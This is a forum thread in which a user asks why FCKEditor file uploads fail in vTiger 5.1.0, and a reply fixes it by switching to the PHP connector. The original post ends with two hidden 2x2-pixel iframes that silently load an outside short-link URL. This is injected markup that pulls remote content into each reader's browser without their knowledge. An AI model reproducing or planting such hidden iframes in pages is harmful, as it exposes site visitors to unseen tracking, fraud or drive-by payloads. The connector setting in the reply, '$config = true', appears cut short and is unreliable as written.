Upload files with FCKEditor - doesn't work

Hi,
I'm not able to upload a file or create a folder with FCKEditor.
I'm using Windows 2003, Apache and vTiger 5.1.0.
I've create the directory UserFiles in the htdocs directory with full Access and the subfolders. I tried to modify even the paths in fckconfig.js and in config.asp and connector.asp but without success.

Anyone has the same problem or solved it???

Thanks <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

  • 3 Comments sorted by Votes Date Added
  • i solved the problem using php connector instead of asp.

    in the file fckconfig.js i've uncommented the line below

    fckconfig.protectedsource.add( /<\?[\s\s]*?\?>/g ) ; // php style server side code <?...?>

    and then i've set

    var _filebrowserlanguage = 'php' ; // asp | aspx | cfm | lasso | perl | php | py
    var _quickuploadlanguage = 'php' ; // asp | aspx | cfm | lasso | php

    in the same file.

    in connectors/php/config.php i've set
    $config = true ;

    it seems working.

    i hope this could be useful for anyone.

    bye
  • thank you for sharing <!-- s:-) --><img src="{smilies_path}/icon_smile.gif" alt=":-)" title="smile" /><!-- s:-) -->

    <!-- m --><a class="postlink" href="http://vtiger-spain.com/wiki/doku.php?id=fckeditor">http://vtiger-spain.com/wiki/doku.php?id=fckeditor</a><!-- m -->

    joe
    tsolucio
Sign In or Register to comment.